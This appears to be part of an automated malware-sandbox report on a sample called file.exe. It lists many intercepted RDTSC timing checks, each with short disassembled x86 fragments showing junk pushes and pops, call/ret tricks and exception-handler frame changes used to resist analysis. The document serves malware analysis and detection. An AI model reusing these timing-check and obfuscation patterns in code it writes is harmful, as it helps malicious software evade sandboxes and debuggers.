                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73DD5 second address: B73DD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73DD9 second address: B73DF3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF624C752F6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF624C752FCh 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73DF3 second address: B73DFD instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF624B4E7D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B774A8 second address: B774AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B774AC second address: B774B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B77B54 second address: B77B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B77C36 second address: B77C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B780D0 second address: B780E5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF624C752FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B781B3 second address: B781B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B781B7 second address: B781CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jns 00007FF624C752F6h 0x00000012 popad 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B781CA second address: B781D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7824F second address: B78253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B78253 second address: B78259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B78259 second address: B78273 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FF624C752FAh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B78273 second address: B78278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B78278 second address: B7827E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7827E second address: B78282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B78603 second address: B78609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7878B second address: B78790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B78790 second address: B787F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007FF624C752F6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FF624C752F8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 movsx esi, dx 0x0000002c jmp 00007FF624C75309h 0x00000031 xchg eax, ebx 0x00000032 jg 00007FF624C75300h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c push ecx 0x0000003d pop ecx 0x0000003e jg 00007FF624C752F6h 0x00000044 popad 0x00000045 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B787F7 second address: B7880A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7DFh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7DA78 second address: B7DA7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7DA7C second address: B7DA80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7DA80 second address: B7DA86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7DA86 second address: B7DA90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF624B4E7D6h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7F9D8 second address: B7F9DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7F9DC second address: B7F9E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81003 second address: B8106D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jns 00007FF624C752F6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov di, C74Ah 0x00000013 adc ebx, 47C85D40h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007FF624C752F8h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 00000019h 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 push esi 0x00000036 pushad 0x00000037 add dword ptr [ebp+124517A8h], ecx 0x0000003d mov dword ptr [ebp+122D19B0h], edi 0x00000043 popad 0x00000044 pop ebx 0x00000045 pushad 0x00000046 mov ecx, dword ptr [ebp+122D183Dh] 0x0000004c movzx ecx, si 0x0000004f popad 0x00000050 push 00000000h 0x00000052 add edi, dword ptr [ebp+122D1D70h] 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d jne 00007FF624C752F6h 0x00000063 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8106D second address: B81073 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8653D second address: B86542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B86542 second address: B86548 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81235 second address: B81242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8406A second address: B84070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81242 second address: B81247 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B89712 second address: B89718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8233E second address: B82344 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B84070 second address: B84074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81247 second address: B8124D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B89718 second address: B89741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007FF624B4E7D6h 0x00000010 push edx 0x00000011 pop edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 jnp 00007FF624B4E7DEh 0x0000001b push eax 0x0000001c push edx 0x0000001d push edx 0x0000001e pop edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B84074 second address: B8408C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF624C752FCh 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B89741 second address: B89745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8408C second address: B8414B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF624C752FCh 0x0000000e popad 0x0000000f nop 0x00000010 xor bx, F20Ah 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007FF624C752F8h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 00000014h 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 add dword ptr [ebp+1244E042h], ecx 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 add ebx, 5A3A60A7h 0x00000049 sub dword ptr [ebp+122D1DCDh], edi 0x0000004f mov eax, dword ptr [ebp+122D00ADh] 0x00000055 push 00000000h 0x00000057 push edi 0x00000058 call 00007FF624C752F8h 0x0000005d pop edi 0x0000005e mov dword ptr [esp+04h], edi 0x00000062 add dword ptr [esp+04h], 00000017h 0x0000006a inc edi 0x0000006b push edi 0x0000006c ret 0x0000006d pop edi 0x0000006e ret 0x0000006f mov bx, 6600h 0x00000073 push FFFFFFFFh 0x00000075 jp 00007FF624C752FCh 0x0000007b mov edi, dword ptr [ebp+122D2CA3h] 0x00000081 sub ebx, dword ptr [ebp+122D1995h] 0x00000087 push eax 0x00000088 push eax 0x00000089 push edx 0x0000008a pushad 0x0000008b jmp 00007FF624C75309h 0x00000090 push ebx 0x00000091 pop ebx 0x00000092 popad 0x00000093 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81356 second address: B81360 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF624B4E7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8AD08 second address: B8AD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81360 second address: B81366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8C299 second address: B8C2FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FF624C752F6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 mov bx, cx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007FF624C752F8h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 call 00007FF624C75302h 0x00000035 mov bx, 56A7h 0x00000039 pop edi 0x0000003a push 00000000h 0x0000003c push ecx 0x0000003d mov bl, 8Bh 0x0000003f pop ebx 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jl 00007FF624C752FCh 0x00000049 jno 00007FF624C752F6h 0x0000004f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8B547 second address: B8B558 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF624B4E7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8B558 second address: B8B55C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8E2F0 second address: B8E351 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edi, 45598F98h 0x0000000f push 00000000h 0x00000011 sbb bl, FFFFFFB7h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007FF624B4E7D8h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 xchg eax, esi 0x00000031 push esi 0x00000032 jmp 00007FF624B4E7E8h 0x00000037 pop esi 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b push ecx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8E351 second address: B8E356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F271 second address: B8F275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F275 second address: B8F292 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF624C75303h 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9035B second address: B9035F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9035F second address: B90363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8D3D8 second address: B8D3DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8E4AC second address: B8E4BA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FF624C752F6h 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B924E0 second address: B924EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B916B5 second address: B916CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a jo 00007FF624C75300h 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8C488 second address: B8C50F instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF624B4E7DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+1244E12Ch], esi 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007FF624B4E7D8h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 and bh, FFFFFFF1h 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007FF624B4E7D8h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 0000001Ch 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 movsx ebx, si 0x00000059 mov eax, dword ptr [ebp+122D0CB1h] 0x0000005f xor bh, FFFFFFB3h 0x00000062 push FFFFFFFFh 0x00000064 sbb ebx, 33D388C9h 0x0000006a nop 0x0000006b pushad 0x0000006c push eax 0x0000006d push edx 0x0000006e pushad 0x0000006f popad 0x00000070 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8C50F second address: B8C523 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B933D3 second address: B933DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FF624B4E7D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B92655 second address: B92659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B92659 second address: B92662 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B93540 second address: B935A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c adc bl, FFFFFFD0h 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov dword ptr fs:[00000000h], esp 0x0000001d mov bx, CDE2h 0x00000021 mov eax, dword ptr [ebp+122D0DB5h] 0x00000027 pushad 0x00000028 cld 0x00000029 call 00007FF624C75306h 0x0000002e pop esi 0x0000002f popad 0x00000030 push FFFFFFFFh 0x00000032 push esi 0x00000033 pop ebx 0x00000034 nop 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FF624C75308h 0x0000003e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B935A2 second address: B935B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F22F second address: B2F233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9CCF6 second address: B9CD1A instructions: 0x00000000 rdtsc 0x00000002 je 00007FF624B4E7D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FF624B4E7E0h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9CD1A second address: B9CD1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9CD1E second address: B9CD22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C636 second address: B9C649 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF624C752F6h 0x00000008 jng 00007FF624C752F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA0DE3 second address: BA0DFC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007FF624B4E7DCh 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA0DFC second address: BA0E0F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF624C752F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA0E0F second address: BA0E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA0E16 second address: BA0E20 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF624C752FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6B50 second address: BA6B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA62E8 second address: BA62FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF624C752F6h 0x0000000a pop eax 0x0000000b jl 00007FF624C752FCh 0x00000011 jbe 00007FF624C752F6h 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA62FF second address: BA6305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6305 second address: BA6311 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6311 second address: BA6315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6315 second address: BA632D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75304h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA632D second address: BA6341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e ja 00007FF624B4E7D6h 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6341 second address: BA6349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6349 second address: BA634F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA634F second address: BA6353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6353 second address: BA6361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FF624B4E7D6h 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6658 second address: BA6675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624C75309h 0x00000009 rdtsc
